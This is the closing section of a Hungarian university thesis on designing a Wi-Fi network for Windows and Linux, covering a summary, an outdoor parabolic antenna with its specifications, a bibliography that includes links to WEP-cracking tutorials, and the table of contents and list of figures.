A WLAN egészségre gyakorolt hatásáról is írtam. Itt a próbáltam összefoglalóan leírni, hogy jelenleg nincs rá bizonyíték, hogy a WLAN káros lenne az ember egészségére. Az internetet böngészve találhatunk olyan cikkeket a témával kapcsolatban, amely szerint vannak, akik ellenzik a WLAN használatát. De egyértelmű bizonyíték arra, hogy a WLAN használata káros az emberi szervezetre egyértelműen nincs. WLAN használatakor fontos a biztonság. Tökéletes biztonság nincs, de tehetünk ellene, hogy a támadó célpontjává váljunk, és biztonságba tudjuk WLAN hálózatunkat üzemeltetni. Szeretném bemutatni az olvasónak, hogy milyen lehet a másik oldalon lenni, azaz egy hacker bőrébe bújva, milyen lépéseket kell megtenni, hogy hálózatunkat tesztelés céljából megpróbáljunk bejutni. Végül az védelemről kívánok szót ejteni, amely alapján a Rádiusz szerver alkalmazása teszi megbízhatóbbá hálózati rendszerünket illetve továbbfejlesztési ötletként egy kültéri antenna, amely a szabadban is lehetővé teszi a felhasználóknak WLAN hálózathoz való hozzáférését.

6.1 Továbbfejlesztési lehetőségek

WLAN hálózatunkat úgy kell megterveznünk, hogy a későbbi felhasználói igényeknek megfelelő módosításokat végre tudjuk hajtani. Gondolnunk kell a kliensek számának növelésére is illetve új szolgáltatások bevezetésére. Ha a hálózati terv elkészítése során nem gondolunk az utólagos bővítésre, akkor nagyobb költséggel számolhatunk.

Diplomamunkámban a tervezett hálózatot igyekeztem úgy megtervezni, hogy a későbbi bővítés könnyen kialakítható legyen a felhasználói igényeknek megfelelően.

A továbbfejlesztési ötletként internetes kutatásaim alapján egy olyan megoldást kerestem, amelynek segítségével kültéren, is lehetne egy olyan antennát felállítani, amely ellenáll az időjárás viszontagságainak, védelemet nyújt a nem kívánt irányokból érkező interferenciát okozó idegen jelekkel szemben. A megoldást a Wifi 22 elnevezésű antennában találtam, meg amely letisztult egyszerű antenna.

69. ábra Wlan parabola antenna

A fejet rögzítő gumiágy a fejtartó kar belsejében van elhelyezve. A kábelt közvetlenül be tudjuk kötni az antennába, így nincs szükség csatlakozóra. Ez az antenna nem más, mint egy parabola antenna, amely 22 dBi nyereséggel rendelkezik, nagy átsugárzási csillapítással, amely nagyobb védelemet nyújt az interferenciát okozó jelekkel szemben. A primer sugárzó rögzítő szára gumiágyban van rögzítve, így az hossz tengelye körül elforgatható. Ez lehetővé teszi, hogy a sugárzó elforgatásával az antennát vízszintesről függőlegesbe állítsuk. Az antenna rögzítésére dupla bilincs szolgál amely, megakadályozza az antenna elfordulást. Természetesen számos más továbbfejlesztési lehetőségünk van ilyen például a videó konferencia rendszerek, de ennek bemutatása nem témája a diplomamunkának.

Az antenna gyári műszaki adatai:

Műszaki adatok:

Frekvenciasáv: 2,4 - 2,5 GHz

Antenna nyereség: 22 dBi

Talpponti impedancia: 50 Ohm

Állóhullám arány: < 1:1,2

Nyílásszög: 12° (-3dB)

Kompatibilitás: IEEE 802.11 b/g

Polarizáció: lineáris

Polarizáció lehetséges beállításai: függőleges, vízszintes, köztes polarizációs síkok

Alkalmazható kábeltípusok: H155, RF240, LMR240, RG6U*

Mechanikai adatok:

Parabola átmérője: 55 cm

Anyaga: festett acéllemez

Típusa: offset parabola

Primer sugárzó mérete: 112 x 112 x 28 mm (WiFi 11)

Rögzítő szár hossza: 45 mm

Súly: 2,11 kg

6.2 Irodalomjegyzék

Könyvek:

Joseph Davis:

Biztonságos vezeték nélküli hálózatok Microsoft Windows alatt az IEEE 802.11 szabvány szerint, SZAK kiadó, 2005

Building Cisco Wireless LAN (Callisma)

802.11 Wireless Networks: The Definitive Guide, Second Edition
Matthew Gast

Pere László

GNU/Linux rendszerek üzemeltetése II. (Kiskapu)

TANENBAUM

Andrew S. Tanenbaum: Számítógép hálózatok (Panem 2004)

Microsoft Technet

KÓNYA László: Számítógép-hálózatok. Budapest, LSI Oktatóközpont, 1999

Edd Dumbill, Brian Jepson, Roger Weeks

Linux a vezeték nélküli világban (Kossuth kiadó 2005)

Bártfai Barnabás

Hálózatépítés otthonra és kirodába (BBs-info 2005)

Internetes publikációk

http://thew0rd.com/2008/08/19/tutorial-cracking-wep-using-backtrack-	2011-0-13
http://zedomax.com/blog/2010/04/18/wep-hack-how-to-crack-wep/	2011-01-13
http://www.nibiru.hu/informatika/wlanconfig.htm	2011.01.13
http://www.techrepublic.com/article/ultimate-wireless-security-guide-microsoft-ias-radius-for-wireless-authentication/6148579	2011.01.13
http://my.safaribooksonline.com/book/networking/network-management/9781602670082	
www.jacsa.net/cms/images/.../zsambekfree_utmutato.pdf	2011.01.13
http://wiki.hup.hu/index.php/Vezetek_nélküli_hálózat	2011.01.13
http://rqbook.uw.hu/book/linux.pdf	2011.01.13
http://www.debian.org/releases/etch/i386/install.pdf.hu	2011-01-13
http://kszkold.sch.bme.hu/support/Schnet/DHCP? CGISESSID=97264dc2c28dbef9ada359059a9646e7	2011-01-13
http://windowshoz.atw.hu/request.php?522	2011-03-10
http://www.ivor.it/wireless/pigtail.htm	2011-03-12
http://www.kobakbt.hu/jegyzet/HalElmGyakWin2000/HalozatElmelet.pdf	2011-05-02
http://wifi-mania.atw.hu/erdekessegek.html	2011-05-10
www.portmasters.com/tech/docs/radius/accounting.html	2011-05-12
<a href="http://www.fzolee.hu/framework/radius_szolgaltatas_konfigurajasa_windows_2008_kornyeze
tben">http://www.fzolee.hu/framework/radius_szolgaltatas_konfigurajasa_windows_2008_kornyeze tben	2011-05-14
http://www.linuxvilag.hu/content/files/cikk/52/cikk_52_33_35.pdf (Mick Bauer)	2011-05-04
http://www.linuxvilag.hu/content/files/cikk/53/cikk_53_52_55.pdf (Mick Bauer)	2011-05-04
http://freeradius.org/	2011-05-04
http://www.youtube.com/watch?v=KxX9TIRC75g	2011-05-06
http://wiki.freeradius.org/Build	2011-05-06

Tartalomjegyzék

Wifi infrastruktúra kialakítása Windows és Linux platformra	1
Köszönet nyilvánítás	2
A szakdolgozat rövid témájának bemutatása	3
Célkitűzés	4
Indoklás	4
2. Helyzet felmérés és elemzés	4
2.1 Kiépítés helye (alaprajz, külső és belső tényezők Az épület alaprajza	6
2.1.1 A kiépítéshez használt eszközök	8
2.1.2 Wifi típusok szabványok	9
2.1.3 A felhasznált eszközök jellemzése a kiépítéshez software és hardware szükségletek felmérése	13
Software szükségletek:	15
2.3.4 Jelenlegi adottságok	17
3. Előzetes tervezés	17
3.1.2 Router típusok (jelterjedésük) a megfelelő router kiválasztása	22
3.1.3 Wifi antenna készítése házilag	23
4.1 Kivitelezés,tesztelés(Fizikai kiépítés)	27
Rádiusz szerver telepítése	29
Linux WLAN építés	35
A Free rádiusz konfigurálása(Linux)	39
Access point beállítása	48
Kábelszerelés krimpelővel	49
4.2 WLAN programok használata	51
4.3 Wifi egészségre gyakorolt hatása	52
5. Wifi biztonság	53
5.1 Titkosítás	53
Linux esetében (WPA2 titkosítás)	56
5.2 Wifi feltörési kísérletek (Etikus hacker)	58
Wlan feltörése:	59
5.3 WLAN hálózatunk védelme	64
RADIUS Server	64
Összefoglalás	65
6.1 Továbbfejlesztési lehetőségek	66
6.2 Irodalomjegyzék	67
Internetes publikáció	68

Ábrajegyzék

1. ábra Tervezésem helyszíne.....	4
2. ábra Földszinti alaprajz.....	6
3. ábra Emelet_1 alaprajz.....	6
4. ábra Iroda alaprajz.....	7
5. ábra Wlan router.....	8
6. ábra Wlan router.....	8
7. ábra Wlan kártya.....	8
8. ábra RJ 45 csatlakozó.....	9
9. ábra RJ 45 törés gátló.....	9
10. ábra Linksys Access Point.....	9
11. ábra Wlan szabványok (a).....	10
12. ábra Wlan szabványok (b).....	10
13. ábra Wlan router.....	13
14. ábra UTP kábel.....	14
15. ábra Wlan kártya.....	14
16. ábra RJ 45 csatlakozó.....	14
17. ábra Rádiusz szerver.....	14
18. ábra Rádiusz szerver elméleti működése.....	15
19. ábra Földszint alaprajz hálózati terve (Ap 192.168.20.1-192.168.20.5).....	17
20. ábra Földszint lefedettségi térkép (Ap 192.168.20.1-192.168.20.5) CAT 6 UTP.....	18
21. ábra Emelet_1 alaprajz hálózati terve (AP 192.168.20.6-192.168.20.9) CAT 6 UTP.....	19
22. ábra Emelet_1 lefedettségi térkép (AP 192.168.20.6-192.168.20.9) CAT 6 UTP.....	19
23. ábra Emelet 2 (Iroda) hálózati terve Cat 6.....	20
24. ábra Emelet2 (Iroda) Lefedettségi térkép (AP 192.168.20.10-192.168.20.15) Cat6.....	20
25. ábra Linksys router.....	22
26. ábra D-link router.....	22
27. ábra Belkin router.....	23
28. ábra N aljat.....	24
29. ábra H155 kábel.....	24
30. ábra Dróthajlítás.....	24
31. ábra WLAN antenna szerkezete.....	24
32. ábra Dróthajlítás.....	25
33. ábra WLAN antenna nyáklemeze.....	25
34. A kész antenna.....	25
35. ábra Parabola antenna.....	26
36. ábra A tervezett WLAN hálózatunk fizikai terve.....	27
37. ábra Windows komponensek kiválasztása.....	30
38. ábra Internet Authentication Service kiválasztása.....	30
39. ábra IAS tulajdonságai.....	31
40. ábra Rádiusz port beállítása.....	31
41. ábra IAS SQL naplózó képesség.....	31
42. ábra Az IAS port beállítása.....	32
43. ábra Az IAS naplózás mérete.....	32
44. ábra Az IAS log file beállítás.....	33
45. ábra Az IAS menedzsment konzol.....	33
46. ábra WLAN kliens beállítása.....	34
47. ábra WPA AES titkosítás beállítás.....	34

48. ábra Rádiusz linux szerver.....	35
49. ábra engedélyező modul.....	42
50. ábra Számvitel modul.....	42
51. ábra Engedélyező modul.....	43
52. ábra Hitelesítő modul.....	43
53. ábra Rádiusz port.....	44
54. ábra Bejelentkezés naplója.....	44
55. ábra SQL kapcsolat felhasználói adatbázishoz.....	45
56. ábra Hálókártya megtekintése a linux rendszeren.....	47
57. ábra RJ 45 színskála.....	49
58. ábra RJ 45 szintábrázat.....	50
59. ábra Wlan titkosítás.....	55
60. ábra Wep működése.....	56
61. ábra Monitormód engedélyezése.....	61
62. ábra Wlan kártyánk monitor módban.....	62
63. ábra Adatgyűjtés.....	62
64. ábra Csomag generálás.....	62
65. ábra AP adatküldés.....	63
66. ábra Csomaggyűjtés.....	63
67. ábra Csomag.....	63
68. ábra Törés.....	64
69. ábra Wlan parabola antenna.....	66